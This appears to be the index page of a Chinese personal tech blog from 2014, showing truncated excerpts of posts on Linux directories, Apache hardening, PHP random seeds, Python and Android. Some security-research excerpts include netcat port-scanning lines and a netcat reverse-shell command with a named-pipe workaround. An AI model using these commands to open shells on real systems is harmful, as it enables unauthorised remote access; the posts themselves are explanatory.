Linxu下重要文件

Aug 24,2014 in Linux read (4230)

/：根目录/boot：系统内核映像以及启动文件/tmp：系统临时文件，用户临时文件在/var/tmp/lib：启动时需要的库文件，非启动时需要的库文件放在/usr/lib，内核模块放在/lib/modules/(kernel version)下/proc：系统状态，实际上磁...

继续阅读

配置隐藏Apache版本号

Aug 23,2014 in Web read (4249)

在httpd.conf中有两处需要修改。1.ServerTokens该选项用于控制服务器是否响应来自客户端的请求，向客户端输出服务器系统类型或者其他重要信息。为了保证安全，应该改为ProductOnly大部分默认情况下为OS2.ServerSignature该选项控制由系统...

继续阅读

Aug 12,2014 in 安全研究 read (5880)

scan port#scan special portnc -v ip port#scan from port1 to port2nc -v -z ip port1-port2listen local port#listen local portnc -l -p port#...

继续阅读

Aug 10,2014 in Web,安全研究 read (4370)

PHP中使用srand来初始化随机数，通常选用time()函数来生成种子，但是这也带来了安全问题，也就是如果我可以获取这个种子，那么我就·可以生成这个特定的随机数，换句话说，相同的种子会产生相同的随机数，写个脚本测试一下。<?php $sead = time()...

继续阅读

Jul 14,2014 in 安全研究 read (6416)

Unix系统一般都有NC的，但是-e选项一般都默认不编译。原生的反弹shell做法是nc -l -vv -p 2222 -e /bin/bash如果这样无法反弹的话，可以尝试下面的方法现在/tmp下创建一个普通管道mknod /tmp/backpipe p或mkfifo /...

继续阅读

Jul 14,2014 in Python read (10232)

通过urllib2获取网页内容import urllib2response = urllib2.urlopen('http://www.baidu.com')html = response.read()print html####import urllib2req = ur...

继续阅读

Jul 14,2014 in Python,Code Review read (19030)

本来想写一个可以编码解码BASE64的小脚本，结果出了个问题，使用base64.b64encoding(str)的时候，总提示模块中没有这个方法，于是dir(base64)，发现只有寥寥几个方法，根本没有编码和解码的方法。文件如下：import sysimport base...

继续阅读

Jul 11,2014 in Android read (4512)

我们先在MainActivity中添加一个按钮<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://s...

继续阅读

Jul 10,2014 in Web,安全研究 read (7294)

正常情况下PHP上传文件的代码一般都是下面这个样子的。<html> <form action="upload.php" method="post" enctype="multipart/form-da...

继续阅读